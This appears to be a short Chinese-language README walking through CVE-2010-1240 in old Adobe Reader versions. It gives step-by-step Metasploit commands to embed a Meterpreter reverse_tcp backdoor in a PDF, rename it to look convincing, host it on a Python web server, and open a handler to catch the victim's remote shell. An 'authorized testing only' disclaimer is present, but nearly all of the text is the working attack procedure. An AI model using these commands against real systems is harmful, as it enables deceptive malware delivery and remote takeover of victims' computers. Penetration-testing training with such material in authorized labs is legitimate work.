
教育性概念验证,演示如何利用 CVE-2010-1240 将 Meterpreter 后门嵌入 PDF 文件,并提供分步 Metasploit 操作说明,用于授权安全测试。
⚠️ 仅供教育和授权的安全研究使用
Windows 和 Mac OS X 上的 Adobe Reader 和 Acrobat 9.x(低于 9.3.3)及 8.x(低于 8.2.3)未限制“启动文件”警告对话框中一个文本字段的内容,这使得远程攻击者更容易诱骗用户执行 PDF 文档中指定的任意本地程序,例如,某文本字段声称“打开”按钮将允许用户阅读加密消息。

首先,运行 msfconsole
msfconsole
然后,设置用于嵌入 PDF 的载荷
use exploit/windows/fileformat/adobe_pdf_embedded_exe
设置 INFILENAME 选项,提供原始 PDF 文件的完整路径
set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
通过设置 FILENAME 选项,将新创建的恶意 PDF 文件命名为更具说服力的名称
set FILENAME laporan.pdf
查找载荷并将其嵌入 PDF 文件
set payload windows/meterpreter/reverse_tcp
设置 LHOST 选项为攻击者的 IP
set LHOST 172.16.10.10
打开新终端,导航到恶意 PDF 文件所在位置
cd .msf4/local/
使用 Python 创建临时服务器
python -m http.server
在受害者机器上下载恶意 PDF 文件
http://172.16.10.10:8000/certificate.pdf
在受害者机器上运行恶意 PDF 文件之前,先在之前的终端中启动监听器
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.10.10
exploit
一旦在受害者机器上执行了恶意 PDF 文件,它将为你提供与受害者机器的连接